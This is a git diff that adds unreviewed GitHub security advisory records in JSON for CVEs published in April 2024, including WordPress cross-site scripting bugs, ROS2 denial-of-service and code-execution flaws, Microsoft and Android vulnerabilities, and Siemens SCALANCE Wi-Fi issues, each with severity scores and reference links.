b/advisories/unreviewed/2024/04/GHSA-68ww-8rpc-355h/GHSA-68ww-8rpc-355h.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-68ww-8rpc-355h", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2738" + ], + "details": "The Permalink Manager Lite and Pro plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the ‘s’ parameter in multiple instances in all versions up to, and including, 2.4.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2738" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/561ac3c17b92cb55d3032504a076fa4b" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/b1eec00e844932c6f2f30a63024b404e" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3052848%40permalink-manager%2Ftrunk&old=3034660%40permalink-manager%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7020d5a1-a4a6-489c-8615-bc7898553bcf?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-696v-5v85-fv9m/GHSA-696v-5v85-fv9m.json b/advisories/unreviewed/2024/04/GHSA-696v-5v85-fv9m/GHSA-696v-5v85-fv9m.json new file mode 100644 index 00000000000..df38b5d8b7a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-696v-5v85-fv9m/GHSA-696v-5v85-fv9m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-696v-5v85-fv9m", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-30676" + ], + "details": "A Denial-of-Service (DoS) vulnerability exists in ROS2 Iron Irwini versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. A malicious user could potentially exploit this vulnerability remotely to crash the ROS2 nodes, thereby causing a denial of service. The flaw allows an attacker to cause unexpected behavior in the operation of ROS2 nodes, which leads to their failure and interrupts the regular operation of the system, thus making it unavailable for its intended users.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30676" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30676" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6c3g-5c2q-h98q/GHSA-6c3g-5c2q-h98q.json b/advisories/unreviewed/2024/04/GHSA-6c3g-5c2q-h98q/GHSA-6c3g-5c2q-h98q.json new file mode 100644 index 00000000000..b894904169d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6c3g-5c2q-h98q/GHSA-6c3g-5c2q-h98q.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6c3g-5c2q-h98q", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-28270" + ], + "details": "An issue discovered in web-flash v3.0 allows attackers to reset passwords for arbitrary users via crafted POST request to /prod-api/user/resetPassword.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28270" + }, + { + "type": "WEB", + "url": "https://github.com/bcvgh/web-flash-Broken-Access-Control-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6c4c-xwfh-gc7q/GHSA-6c4c-xwfh-gc7q.json b/advisories/unreviewed/2024/04/GHSA-6c4c-xwfh-gc7q/GHSA-6c4c-xwfh-gc7q.json new file mode 100644 index 00000000000..d2fc797e053 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6c4c-xwfh-gc7q/GHSA-6c4c-xwfh-gc7q.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6c4c-xwfh-gc7q", + "modified": "2024-04-09T09:31:10Z", + "published": "2024-04-09T09:31:10Z", + "aliases": [ + "CVE-2024-30692" + ], + "details": "A issue was discovered in ROS2 Galactic Geochelone versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to cause a denial of service (DoS) in the ROS2 nodes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30692" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30692" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6gj3-px4j-83rq/GHSA-6gj3-px4j-83rq.json b/advisories/unreviewed/2024/04/GHSA-6gj3-px4j-83rq/GHSA-6gj3-px4j-83rq.json new file mode 100644 index 00000000000..4b89ae540d0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6gj3-px4j-83rq/GHSA-6gj3-px4j-83rq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6gj3-px4j-83rq", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29990" + ], + "details": "Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29990" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29990" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6gv8-hx3q-gqrw/GHSA-6gv8-hx3q-gqrw.json b/advisories/unreviewed/2024/04/GHSA-6gv8-hx3q-gqrw/GHSA-6gv8-hx3q-gqrw.json new file mode 100644 index 00000000000..cf093b2d391 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6gv8-hx3q-gqrw/GHSA-6gv8-hx3q-gqrw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6gv8-hx3q-gqrw", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29746" + ], + "details": "In lpm_req_handler of lpm.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29746" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6hjh-xx5m-jf35/GHSA-6hjh-xx5m-jf35.json b/advisories/unreviewed/2024/04/GHSA-6hjh-xx5m-jf35/GHSA-6hjh-xx5m-jf35.json new file mode 100644 index 00000000000..03fc5f89681 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6hjh-xx5m-jf35/GHSA-6hjh-xx5m-jf35.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6hjh-xx5m-jf35", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26222" + ], + "details": "Windows DNS Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26222" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26222" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6hjj-7r3r-92p5/GHSA-6hjj-7r3r-92p5.json b/advisories/unreviewed/2024/04/GHSA-6hjj-7r3r-92p5/GHSA-6hjj-7r3r-92p5.json new file mode 100644 index 00000000000..4f1edaa437f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6hjj-7r3r-92p5/GHSA-6hjj-7r3r-92p5.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6hjj-7r3r-92p5", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52546" + ], + "details": "Vulnerability of package name verification being bypassed in the Calendar app.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52546" + }, + { + "type": "WEB", + "url": "https://https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6m43-26j2-67g9/GHSA-6m43-26j2-67g9.json b/advisories/unreviewed/2024/04/GHSA-6m43-26j2-67g9/GHSA-6m43-26j2-67g9.json new file mode 100644 index 00000000000..e0fb4319edd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6m43-26j2-67g9/GHSA-6m43-26j2-67g9.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m43-26j2-67g9", + "modified": "2024-04-07T00:30:32Z", + "published": "2024-04-07T00:30:32Z", + "aliases": [ + "CVE-2024-3415" + ], + "details": "A vulnerability was found in SourceCodester Human Resource Information System 1.0. It has been classified as problematic. Affected is an unknown function of the file Superadmin_Dashboard/process/addbranches_process.php. The manipulation of the argument branches_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259584.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3415" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Human-Resource-Information-System/Human-Resource-Information-System-03.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259584" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259584" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311442" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T23:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6m86-m75c-rj5c/GHSA-6m86-m75c-rj5c.json b/advisories/unreviewed/2024/04/GHSA-6m86-m75c-rj5c/GHSA-6m86-m75c-rj5c.json new file mode 100644 index 00000000000..1b42bac942b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6m86-m75c-rj5c/GHSA-6m86-m75c-rj5c.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m86-m75c-rj5c", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-30215" + ], + "details": "The Resource Settings page allows a high privilege attacker to load exploitable payload to be stored and reflected whenever a User visits the page. In a successful attack, some information could be obtained and/or modified. However, the attacker does not have control over what information is obtained, or the amount or kind of loss is limited.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30215" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3421453" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6mr7-mqw3-p8r7/GHSA-6mr7-mqw3-p8r7.json b/advisories/unreviewed/2024/04/GHSA-6mr7-mqw3-p8r7/GHSA-6mr7-mqw3-p8r7.json new file mode 100644 index 00000000000..2875bb72131 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6mr7-mqw3-p8r7/GHSA-6mr7-mqw3-p8r7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mr7-mqw3-p8r7", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29054" + ], + "details": "Microsoft Defender for IoT Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29054" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29054" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6mrw-fw7h-8g24/GHSA-6mrw-fw7h-8g24.json b/advisories/unreviewed/2024/04/GHSA-6mrw-fw7h-8g24/GHSA-6mrw-fw7h-8g24.json new file mode 100644 index 00000000000..f5415227ab1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6mrw-fw7h-8g24/GHSA-6mrw-fw7h-8g24.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mrw-fw7h-8g24", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-29782" + ], + "details": "In tmu_get_tr_num_thresholds of tmu.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29782" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6p2g-wx5c-v95j/GHSA-6p2g-wx5c-v95j.json b/advisories/unreviewed/2024/04/GHSA-6p2g-wx5c-v95j/GHSA-6p2g-wx5c-v95j.json new file mode 100644 index 00000000000..1b2a6cd7d0f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6p2g-wx5c-v95j/GHSA-6p2g-wx5c-v95j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6p2g-wx5c-v95j", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28936" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28936" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28936" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6pfx-3rw7-5c4g/GHSA-6pfx-3rw7-5c4g.json b/advisories/unreviewed/2024/04/GHSA-6pfx-3rw7-5c4g/GHSA-6pfx-3rw7-5c4g.json new file mode 100644 index 00000000000..164383a28eb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6pfx-3rw7-5c4g/GHSA-6pfx-3rw7-5c4g.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6pfx-3rw7-5c4g", + "modified": "2024-04-05T21:32:42Z", + "published": "2024-04-05T21:32:42Z", + "aliases": [ + "CVE-2024-29738" + ], + "details": "In gov_init, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29738" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6pxv-7652-xcm8/GHSA-6pxv-7652-xcm8.json b/advisories/unreviewed/2024/04/GHSA-6pxv-7652-xcm8/GHSA-6pxv-7652-xcm8.json new file mode 100644 index 00000000000..831341eba7b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6pxv-7652-xcm8/GHSA-6pxv-7652-xcm8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6pxv-7652-xcm8", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3313" + ], + "details": "SUBNET Solutions Inc. has identified vulnerabilities in third-party \ncomponents used in PowerSYSTEM Server 2021 and Substation Server 2021.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3313" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-100-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1357" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T23:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6q5m-66wv-m3p2/GHSA-6q5m-66wv-m3p2.json b/advisories/unreviewed/2024/04/GHSA-6q5m-66wv-m3p2/GHSA-6q5m-66wv-m3p2.json new file mode 100644 index 00000000000..3c96457a025 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6q5m-66wv-m3p2/GHSA-6q5m-66wv-m3p2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6q5m-66wv-m3p2", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-20689" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20689" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20689" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6q9x-mr9m-fh82/GHSA-6q9x-mr9m-fh82.json b/advisories/unreviewed/2024/04/GHSA-6q9x-mr9m-fh82/GHSA-6q9x-mr9m-fh82.json new file mode 100644 index 00000000000..e85848a037d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6q9x-mr9m-fh82/GHSA-6q9x-mr9m-fh82.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6q9x-mr9m-fh82", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-30702" + ], + "details": "An issue was discovered in ROS2 Galactic Geochelone in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code via packages or nodes within the ROS2 system.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30702" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30702" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6qcj-8j88-4gxg/GHSA-6qcj-8j88-4gxg.json b/advisories/unreviewed/2024/04/GHSA-6qcj-8j88-4gxg/GHSA-6qcj-8j88-4gxg.json new file mode 100644 index 00000000000..bca42e38991 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6qcj-8j88-4gxg/GHSA-6qcj-8j88-4gxg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6qcj-8j88-4gxg", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-30189" + ], + "details": "A vulnerability has been identified in SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0) (All versions), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0) (All versions), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0) (All versions), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0) (All versions), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0) (All versions), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0) (All versions), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6) (All versions), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0) (All versions), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6) (All versions), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0) (All versions), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0) (All versions), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0) (All versions), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0) (All versions), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0) (All versions), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0) (All versions), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0) (All versions), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0) (All versions), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0) (All versions), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0) (All versions), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0) (All versions), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6) (All versions), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0) (All versions), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0) (All versions), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6) (All versions), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0) (All versions), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0) (All versions), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0) (All versions), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0) (All versions), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0) (All versions), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0) (All versions), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0) (All versions), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0) (All versions), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0) (All versions), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0) (All versions), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0) (All versions), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0) (All versions), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0) (All versions), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0) (All versions), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0) (All versions), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0) (All versions), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0) (All versions), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0) (All versions), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0) (All versions), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0) (All versions), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0) (All versions), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0) (All versions), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0) (All versions), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0) (All versions), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) (All versions). This CVE refers to Scenario 1 \"Leak frames from the Wi-Fi queue\" of CVE-2022-47522.\n\nAffected devices queue frames in order to subsequently change the security context and leak the queued frames. This could allow a physically proximate attacker to intercept (possibly cleartext) target-destined frames.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30189" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-457702.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6r33-7cp5-q454/GHSA-6r33-7cp5-q454.json b/advisories/unreviewed/2024/04/GHSA-6r33-7cp5-q454/GHSA-6r33-7cp5-q454.json new file mode 100644 index 00000000000..5384289efc6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6r33-7cp5-q454/GHSA-6r33-7cp5-q454.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6r33-7cp5-q454", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2666" + ], + "details": "The Premium Addons for Elementor plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the plugin's Bullet List Widget in all versions up to, and including, 4.10.24 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and attempts to edit the content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2666" + }, + { + "type": "WEB", + "url": 